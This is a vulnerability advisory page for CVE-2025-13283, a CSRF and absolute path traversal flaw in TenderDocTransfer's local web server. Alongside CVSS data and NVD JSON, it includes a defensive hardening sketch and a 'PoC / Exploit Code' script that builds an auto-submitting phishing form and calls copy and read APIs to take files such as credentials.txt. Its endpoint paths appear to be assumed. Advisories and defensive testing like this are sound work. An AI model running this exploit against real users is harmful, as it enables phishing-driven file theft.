Security Vulnerability Report
CVE-2025-13283 CVSS 7.1 HIGH

Published: 2025-11-17 04:15:55
Last Modified: 2025-12-19 17:01:40

Description

TenderDocTransfer developed by Chunghwa Telecom has an Arbitrary File Copy and Paste vulnerability. The application sets up a simple local web server and provides APIs for communication with the target website. Due to the lack of CSRF protection in the APIs, unauthenticated remote attackers could use these APIs through phishing. Additionally, one of the APIs contains an Absolute Path Traversal vulnerability. Attackers can copy arbitrary files on the user's system and paste them into any path, which poses a potential risk of information leakage or could consume hard drive space by copying files in large volumes.
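As an added defensive example (this is not TenderDocTransfer code and not part of the advisory), the following Python sketch shows how a local helper server can close both weaknesses the description names: a CSRF gate (CWE-352) that rejects the auto-submitted cross-site form a phishing page can produce, and a path check (CWE-36) that confines client-supplied names to a sandbox directory and refuses absolute paths in both Windows and POSIX syntax. The endpoint shape (`/api/copy` with `source` and `destination` fields) mirrors the PoC on this page, but that shape, the `X-Local-Token` header, the `ALLOWED_ORIGINS` entry, the size cap and the sandbox location are all assumptions, and the sample files are constructed.

```python
import hmac
import secrets
import shutil
import tempfile
from pathlib import Path, PurePosixPath, PureWindowsPath

# Origin allowed to drive the local API. Constructed placeholder; the real
# counterpart site is not named on the page.
ALLOWED_ORIGINS = {"https://tender.example.test"}

# Per-launch secret the trusted page must echo in a custom header (assumed scheme).
SESSION_TOKEN = secrets.token_urlsafe(32)

# Cap on a single copy, limiting the disk-filling impact the advisory mentions.
MAX_COPY_BYTES = 50 * 1024 * 1024


def is_trusted_request(headers, token):
    """CSRF gate (CWE-352). A cross-site HTML form cannot set custom headers
    or send application/json without a CORS preflight, so requiring all three
    checks stops the phishing page's form post; the origin allowlist is
    defence in depth."""
    origin = headers.get("Origin", "")
    ctype = headers.get("Content-Type", "").split(";")[0].strip().lower()
    presented = headers.get("X-Local-Token", "")
    return (
        origin in ALLOWED_ORIGINS
        and ctype == "application/json"
        and hmac.compare_digest(presented.encode(), token.encode())
    )


def safe_join(base_dir, user_path):
    """Map a client-supplied relative name onto base_dir (CWE-36 fix).
    Rejects absolute and drive-relative paths in Windows and POSIX syntax,
    any '..' component, and anything that still resolves outside the
    sandbox (for example through a symlink)."""
    if not user_path or "\x00" in user_path:
        raise ValueError("empty or NUL-containing path")
    win, posix = PureWindowsPath(user_path), PurePosixPath(user_path)
    if win.is_absolute() or win.drive or win.root or posix.is_absolute():
        raise ValueError(f"absolute path rejected: {user_path!r}")
    parts = win.parts  # PureWindowsPath splits on both '\\' and '/'
    if not parts or ".." in parts:
        raise ValueError(f"traversal rejected: {user_path!r}")
    base = Path(base_dir).resolve()
    target = base.joinpath(*parts).resolve()
    try:
        target.relative_to(base)
    except ValueError:
        raise ValueError(f"path escapes sandbox: {user_path!r}") from None
    return target


def handle_copy(headers, body, base_dir, token=SESSION_TOKEN):
    """Hardened handler for an assumed POST /api/copy {source, destination}.
    Returns (status, message) so it can be exercised without a server."""
    if not is_trusted_request(headers, token):
        return 403, "cross-site or unauthenticated request refused"
    try:
        src = safe_join(base_dir, body.get("source", ""))
        dst = safe_join(base_dir, body.get("destination", ""))
    except ValueError as exc:
        return 400, str(exc)
    if not src.is_file():
        return 404, "source not found"
    if src.stat().st_size > MAX_COPY_BYTES:
        return 413, "source too large"
    dst.parent.mkdir(parents=True, exist_ok=True)
    shutil.copyfile(src, dst)
    return 200, f"copied to {dst.relative_to(Path(base_dir).resolve())}"


def demo():
    """Run the handler against a constructed sandbox and return the status
    code of each scenario."""
    token = "demo-token"  # constructed; a real server uses SESSION_TOKEN
    sandbox = tempfile.mkdtemp()
    Path(sandbox, "docs").mkdir()
    Path(sandbox, "docs", "a.txt").write_text("hello")
    trusted = {"Origin": "https://tender.example.test",
               "Content-Type": "application/json", "X-Local-Token": token}
    # What a phishing page's auto-submitting form actually sends: a foreign
    # Origin, a text/plain body, and no way to attach the custom header.
    phished = {"Origin": "https://attacker.example", "Content-Type": "text/plain"}
    cases = {
        "legit_copy": (trusted, {"source": "docs/a.txt", "destination": "out/b.txt"}),
        "csrf_form_post": (phished, {"source": "docs/a.txt", "destination": "out/c.txt"}),
        "windows_absolute": (trusted, {"source": "C:\\Users\\victim\\secret.txt", "destination": "out/d.txt"}),
        "posix_absolute": (trusted, {"source": "/etc/passwd", "destination": "out/e.txt"}),
        "dotdot_escape": (trusted, {"source": "docs/a.txt", "destination": "..\\..\\outside.txt"}),
        "missing_source": (trusted, {"source": "docs/nope.txt", "destination": "out/f.txt"}),
    }
    results = {name: handle_copy(h, b, sandbox, token)[0] for name, (h, b) in cases.items()}
    results["copied_ok"] = Path(sandbox, "out", "b.txt").read_text() == "hello"
    return results


if __name__ == "__main__":
    for name, status in demo().items():
        print(f"{name:18s} -> {status}")
```

Running the block prints one status per scenario: the legitimate JSON request with the token succeeds, the form-style cross-site post is refused before any file system access, and every absolute or parent-relative path is rejected with 400 rather than resolved. The custom-header requirement is what actually defeats the form-post vector, since HTML forms cannot set headers; the origin allowlist and JSON content-type check cover a page that can issue fetch() requests but is not the vendor's site.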

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:cht:tenderdoctransfer:*:*:*:*:*:*:*:* - VULNERABLE
TenderDocTransfer < 0.41.159 (fixed version)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import html

# CVE-2025-13283 PoC - CSRF + Path Traversal in TenderDocTransfer
# Target: TenderDocTransfer local web server
# Attack: Copy arbitrary file to attacker-controlled location

TARGET_HOST = "http://localhost:8080"  # Default TenderDocTransfer server


def generate_csrf_exploit(attacker_file_path, victim_file_path):
    """
    Generate CSRF exploit HTML that copies victim file to attacker path
    victim_file_path: Absolute path of file to copy (e.g., C:\\Users\\victim\\Documents\\config.ini)
    attacker_file_path: Absolute destination path for copied file
    """
    exploit_html = f'''
<!DOCTYPE html>
<html>
<head>
<title>Document Transfer</title>
</head>
<body>
<h1>Loading documents...</h1>
<form id="exploit" action="{TARGET_HOST}/api/copy" method="POST" enctype="text/plain">
<input type="hidden" name="source" value="{html.escape(victim_file_path)}">
<input type="hidden" name="destination" value="{html.escape(attacker_file_path)}">
</form>
<script>
document.getElementById('exploit').submit();
</script>
</body>
</html>
'''
    return exploit_html


def exploit_copy_api(source_file, dest_file):
    """
    Direct API call to copy file using path traversal
    """
    endpoint = f"{TARGET_HOST}/api/copy"
    payload = {
        "source": source_file,
        "destination": dest_file,
        "operation": "copy"
    }
    try:
        response = requests.post(endpoint, json=payload, timeout=10)
        return response.status_code, response.text
    except requests.exceptions.RequestException as e:
        return None, str(e)


def exploit_read_api(file_path):
    """
    Read file content via API (information disclosure)
    """
    endpoint = f"{TARGET_HOST}/api/read"
    params = {"path": file_path}
    try:
        response = requests.get(endpoint, params=params, timeout=10)
        return response.status_code, response.text
    except requests.exceptions.RequestException as e:
        return None, str(e)


if __name__ == "__main__":
    # Example: Copy sensitive config file
    victim_file = "C:\\Users\\victim\\Documents\\credentials.txt"
    attacker_dest = "C:\\Users\\attacker\\Downloads\\stolen_credentials.txt"

    print("CVE-2025-13283 PoC - TenderDocTransfer Path Traversal")
    print("=" * 50)

    # Method 1: Direct API exploitation
    print(f"\n[+] Attempting to copy: {victim_file}")
    status, response = exploit_copy_api(victim_file, attacker_dest)
    if status == 200:
        print(f"[+] Success! File copied to: {attacker_dest}")
    else:
        print(f"[-] Failed with status {status}: {response}")

    # Method 2: Generate CSRF exploit for phishing
    print("\n[+] Generating CSRF exploit HTML...")
    exploit = generate_csrf_exploit(attacker_dest, victim_file)
    with open("csrf_exploit.html", "w") as f:
        f.write(exploit)
    print("[+] CSRF exploit saved to csrf_exploit.html")
    print("[+] Deploy this page on attacker server and phish victim")
```

References

https://www.twcert.org.tw/en/cp-139-10511-10f3a-2.html (Third Party Advisory)
https://www.twcert.org.tw/tw/cp-132-10510-3719c-1.html (Third Party Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13283", "sourceIdentifier": "[email protected]", "published": "2025-11-17T04:15:54.800", "lastModified": "2025-12-19T17:01:39.703", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "TenderDocTransfer developed by Chunghwa Telecom has a Arbitrary File Copy and Paste vulnerability. The application sets up a simple local web server and provides APIs for communication with the target website. Due to the lack of CSRF protection in the APIs, unauthenticated remote attackers could use these APIs through phishing. Additionally, one of the APIs contains an Absolute Path Traversal vulnerability. Attackers can copy arbitrary files on the user's system and paste them into any path, which poses a potential risk of information leakage or could consume hard drive space by copying files in large volumes."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.0, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", 
"modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-36"}, {"lang": "en", "value": "CWE-352"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:cht:tenderdoctransfer:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.41.159", "matchCriteriaId": "5E474265-3B59-4B3C-AAAD-87E8F1C7995C"}]}]}], "references": [{"url": "https://www.twcert.org.tw/en/cp-139-10511-10f3a-2.html", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.twcert.org.tw/tw/cp-132-10510-3719c-1.html", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}